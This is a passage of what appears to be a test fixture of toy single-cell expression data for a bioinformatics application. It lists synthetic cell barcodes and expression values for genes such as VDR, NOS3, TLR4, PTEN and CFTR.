"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"VDR Expression": {
"name": "VDR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.58,
2.0,
2.58,
1.0,
1.0,
1.58,
2.81,
3.0,
2.81,
2.0,
2.32,
2.32,
1.58,
2.58,
2.58,
2.58,
1.58,
2.0,
1.58,
1.0,
1.58,
1.58,
1.0,
2.81,
2.0,
2.58,
3.0,
3.0,
1.0,
2.32,
1.0,
2.81,
2.32,
2.81,
3.0,
1.0,
3.0,
2.32,
2.0,
1.58,
2.0,
2.0,
1.58,
2.32,
2.58,
1.0,
2.81,
2.81,
3.0,
2.58,
2.32,
2.81,
2.32,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NOS3 Cells": {
"name": "NOS3 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NOS3 Expression": {
"name": "NOS3 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.32,
2.58,
1.58,
3.0,
1.58,
1.0,
2.81,
3.0,
2.32,
2.58,
2.58,
2.58,
1.0,
1.0,
1.58,
1.58,
2.0,
2.58,
2.0,
2.0,
2.32,
2.58,
1.0,
2.0,
1.0,
2.32,
2.58,
2.32,
1.58,
2.81,
3.0,
2.58,
3.0,
2.0,
1.0,
2.0,
2.32,
2.32,
1.58,
2.81,
2.81,
2.81,
3.0,
1.58,
2.32,
2.81,
2.0,
2.32,
2.81,
2.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TLR4 Cells": {
"name": "TLR4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TLR4 Expression": {
"name": "TLR4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
1.58,
1.0,
2.0,
2.58,
2.58,
2.32,
2.58,
1.0,
3.0,
2.0,
2.58,
3.0,
2.0,
2.32,
2.32,
2.58,
2.81,
1.0,
1.0,
2.32,
1.58,
2.58,
2.32,
2.58,
2.0,
2.58,
2.81,
2.32,
2.32,
1.58,
3.0,
2.0,
2.81,
2.32,
2.32,
2.0,
1.58,
1.0,
3.0,
2.32,
2.81,
2.32,
2.0,
2.81,
3.0,
1.0,
2.32,
3.0,
1.58,
1.58,
2.32,
2.58,
2.32,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CTNNB1 Cells": {
"name": "CTNNB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CTNNB1 Expression": {
"name": "CTNNB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
2.32,
2.32,
2.58,
2.0,
2.58,
1.0,
1.58,
2.32,
2.0,
1.58,
1.0,
2.32,
3.0,
2.58,
2.58,
2.0,
2.32,
2.58,
2.81,
1.0,
2.81,
2.32,
2.58,
2.81,
1.58,
2.32,
2.58,
2.58,
2.81,
2.0,
2.58,
2.58,
2.58,
2.32,
2.0,
2.58,
2.32,
1.58,
3.0,
2.32,
2.58,
2.81,
1.0,
2.0,
1.58,
2.81,
2.32,
2.0,
2.81,
1.0,
2.32,
3.0,
2.0,
1.0,
1.0,
2.32,
2.58,
2.81,
2.58,
2.81,
2.58,
3.0,
1.58,
2.58,
2.81,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PTEN Cells": {
"name": "PTEN Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PTEN Expression": {
"name": "PTEN Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
3.0,
1.0,
2.32,
2.81,
3.0,
1.58,
2.32,
1.58,
2.81,
2.58,
2.0,
1.58,
1.58,
1.58,
1.58,
2.58,
2.0,
1.58,
2.0,
2.32,
1.58,
3.0,
3.0,
3.0,
2.81,
2.0,
2.0,
2.58,
2.58,
2.58,
2.81,
2.81,
2.81,
2.0,
2.0,
2.32,
2.0,
2.0,
1.58,
3.0,
2.32,
2.0,
1.0,
1.58,
1.58,
1.58,
3.0,
2.32,
2.81,
3.0,
1.0,
3.0,
1.0,
2.81,
1.0,
2.58,
2.0,
2.58,
1.0,
2.0,
2.0,
2.32,
1.0,
1.58,
2.81,
3.0,
2.32,
2.32,
1.0,
3.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CXCL8 Cells": {
"name": "CXCL8 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CXCL8 Expression": {
"name": "CXCL8 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.32,
2.58,
1.0,
3.0,
1.58,
1.0,
2.81,
1.0,
2.32,
2.0,
1.58,
1.0,
1.58,
2.81,
2.0,
1.58,
1.58,
2.58,
1.0,
3.0,
3.0,
2.0,
2.0,
3.0,
2.0,
2.32,
2.81,
1.58,
1.0,
2.0,
3.0,
2.58,
3.0,
2.32,
2.58,
2.58,
2.32,
1.58,
2.0,
2.32,
1.0,
3.0,
1.0,
2.0,
2.32,
2.58,
2.0,
1.0,
2.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CFTR Cells": {
"name": "CFTR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
